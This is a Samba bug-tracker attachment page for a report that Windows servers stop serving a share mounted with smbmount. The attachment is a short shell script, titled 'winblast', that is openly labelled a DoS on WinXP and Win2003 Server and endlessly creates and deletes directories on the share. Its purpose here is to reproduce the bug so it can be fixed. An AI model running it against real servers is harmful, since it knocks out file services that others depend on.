The Samba-Bugzilla – Attachment 317 Details for
Bug 878
access to server share suddenly ceases working. smbmount makes windows server stop serving.
Home
|
New
|
Browse
|
Search
|
[?]
|
Reports
|
Requests
|
Help
|
New Account
|
Log In
[x]
|
Forgot Password
Login:
[x]
DoS Shell script that creates and deletes directories
winblast.sh (text/plain), 761 bytes, created by
Daniel Kabs
on 2003-12-11 02:30:17 UTC
(
hide
)
Description:
DoS Shell script that creates and deletes directories
Filename:
MIME Type:
Creator:
Daniel Kabs
Created:
2003-12-11 02:30:17 UTC
Size:
761 bytes
patch
obsolete
>#!/bin/sh ># ># winblast v3 - DoS on WinXP, Win2003Srv ># 2003-12-04 Steve Ladjabi > >count=0 > ># using 'pathcount' directories >pathcount=1000 > >echo running \'winblast v3\' with $pathcount files in loop ... > >while [ 1 ]; do > p=$((pathcount*2-1)) > stop=$((pathcount-1)) > while [ "$p" != "$stop" ]; do > dirname=wbst$p > # delete old directory if it exists and exit on any error > if [ -d $dirname ]; then > rmdir $dirname || exit 3 > fi; > > # generating directory and exit on any error > mkdir $dirname || exit 1 > p=$((p-1)) > count=$((count+1)) > done; > echo $count directories generated ... >done >
You cannot view the attachment while viewing its details because your browser does not support IFRAMEs.
View the attachment on a separate page
.
View Attachment As Raw
Actions:
View
Attachments on
bug 878
: 317 |
318